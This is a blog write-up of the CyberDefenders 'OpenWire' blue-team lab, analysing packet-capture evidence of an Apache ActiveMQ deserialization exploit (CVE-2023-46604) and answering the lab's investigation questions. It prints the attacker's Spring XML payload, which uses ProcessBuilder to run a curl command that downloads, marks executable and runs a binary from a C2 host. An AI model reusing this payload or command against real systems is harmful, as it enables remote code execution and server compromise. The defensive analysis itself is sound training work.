Bernardo's Blog

CyberDefenders - OpenWire

Investigate a Java deserialization vulnerability in Apache ActiveMQ that enables remote code execution through insecure class loading.

Intro Text

During your shift as a tier-2 SOC analyst, you receive an escalation from a tier-1 analyst regarding a public-facing server. This server has been flagged for making outbound connections to multiple suspicious IPs. In response, you initiate the standard incident response protocol, which includes isolating the server from the network to prevent potential lateral movement or data exfiltration and obtaining a packet capture from the NSM utility for analysis. Your task is to analyze the pcap and assess for signs of malicious activity.

A link to the lab can be found here: https://cyberdefenders.org/blueteam-ctf-challenges/openwire/

Questions

  1. By identifying the C2 IP, we can block traffic to and from this IP, helping to contain the breach and prevent further data exfiltration or command execution. Can you provide the IP of the C2 server that communicated with our server?

    I immediately spotted the OpenWire communications that went on in the first few packets. Based on that, and the fact the lab description told us that an Apache ActiveMQ instance was being exploited, I put the two and two together and determined that the initiator of this communication was the C2 server, so I just copied the source IP of the first TCP request.

    Wireshark window

  2. Initial entry points are critical to trace the attack vector back. What is the port number of the service the adversary exploited?

    Still looking at that first request, we can see that the attacker tried to connect directly to port 61616 on our server.

  3. Following up on the previous question, what is the name of the service found to be vulnerable?

    Looking at the OpenWire Protocol chatter in the same TCP stream as the first request, we can infer that Apache ActiveMQ is being used.

  4. The attacker's infrastructure often involves multiple components. What is the IP of the second C2 server?

    If we continue inspecting the packets, we can see that our server makes a request to the C2 server, requesting a XML file from it (ruh roh 😬). Looking at the file being requested, we can see that it will try to start a new process and download a file from the attacker's second C2 server: 128.199.52.72

        GET /invoice.xml HTTP/1.1
    Cache-Control: no-cache
    Pragma: no-cache
    User-Agent: Java/11.0.21
    Host: 146.190.21.92:8000
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: keep-alive


    HTTP/1.0 200 OK
    Server: SimpleHTTP/0.6 Python/3.8.10
    Date: Tue, 12 Dec 2023 13:38:28 GMT
    Content-type: application/xml
    Content-Length: 816
    Last-Modified: Tue, 12 Dec 2023 13:37:45 GMT

    <?xml version="1.0" encoding="UTF-8" ?>
        <beans xmlns="http://www.springframework.org/schema/beans"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="
        http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
            <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
                <constructor-arg >
                <list>
                    <!--value>open</value>
                    <value>-a</value>
                    <value>calculator</value -->
                    <value>bash</value>
                    <value>-c</value>
                    <value>curl -s -o /tmp/docker http://128.199.52.72/docker; chmod +x /tmp/docker; ./tmp/docker</value>
                </list>
                </constructor-arg>
            </bean>
        </beans>

  5. Attackers usually leave traces on the disk. What is the name of the reverse shell executable dropped on the server?

    We can see this clearly on the file above, the file name is docker, likely as an effort to "obfuscate" the malicious process when an sysadmin is looking at the system.

  6. What Java class was invoked by the XML file to run the exploit?

    Same as above, we can see this in the file above, it attempts to use java.lang.ProcessBuilder to remotely execute code on our server.

  7. To better understand the specific security flaw exploited, can you identify the CVE identifier associated with this vulnerability?

    Searching on Google for "apache mq openwire cve" we can find a lot of data on CVE-2023-46604, which seems to be the vulnerability we're looking at.

  8. The vendor addressed the vulnerability by adding a validation step to ensure that only valid Throwable classes can be instantiated, preventing exploitation. In which Java class and method was this validation step added?

    Ooooh I loved this question!! Very nice! Sadly for my love of analyzing code, the answer was immediately in front of me when I opened the github changes, but I still liked this kind of question! The class and method patched were BaseDataStreamMarshaller.createThrowable.

Conclusion

Another good lab exploring a kinda simple exploit, thank you CyberDefenders for the chance to practice our skills!

Previous

CyberDefenders - ShadowRoast

Copyright 2026